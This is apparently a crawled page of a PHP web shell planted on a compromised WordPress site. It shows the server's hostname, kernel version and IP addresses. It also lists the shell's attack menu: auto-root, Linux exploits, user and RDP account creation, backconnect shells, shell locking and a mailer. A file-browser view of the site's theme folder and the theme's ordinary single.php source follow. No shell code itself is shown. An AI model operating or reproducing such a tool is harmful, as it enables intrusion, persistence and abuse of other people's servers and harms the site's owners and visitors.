Linux webm022.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.127.20.22 | : 216.73.216.158
Cant Read [ /etc/named.conf ]
7.4.33
tpwlexj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
tpwlexj /
www /
wp-content /
themes /
convertio /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
404.php
803
B
-rw-r--r--
comments.php
1.79
KB
-rw-r--r--
editor-style.css
9.44
KB
-rw-r--r--
footer.php
1.06
KB
-rw-r--r--
functions.php
2.99
KB
-rw-r--r--
header.php
2.57
KB
-rw-r--r--
index.php
1.19
KB
-rw-r--r--
maintenance.php
813
B
-rw-r--r--
page.php
1.24
KB
-rw-r--r--
screenshot.png
135.63
KB
-rw-r--r--
search.php
929
B
-rw-r--r--
searchform.php
673
B
-rw-r--r--
sidebar-left.php
347
B
-rw-r--r--
sidebar-right.php
350
B
-rw-r--r--
sidebar.php
180
B
-rw-r--r--
single.php
1.04
KB
-rw-r--r--
style.css
258.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single.php
<?php /** * The template for displaying all single posts * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#single-post * * @package uicore-theme */ get_header(); ?> <div id="primary" class="content-area"> <?php if (class_exists('\UiCore\Core')){ new \Uicore\Posts; }else { ?> <main class="uicore-container"> <?php if (!class_exists('\UiCore\Core')){ get_sidebar('left'); } ?> <div class="uicore-row"> <?php if ( have_posts() ) { /* Start the Loop */ while ( have_posts() ) { the_post(); get_template_part( 'template-parts/content', get_post_type() ); } // If comments are open or we have at least one comment, load up the comment template. if ( comments_open() || get_comments_number() ) : comments_template(); endif; }else{ get_template_part( 'template-parts/content', 'none' ); } ?> </div> <?php if (!class_exists('\UiCore\Core')){ get_sidebar('right'); } ?> </main> <?php } ?> </div><!-- #primary --> <?php get_footer();
Close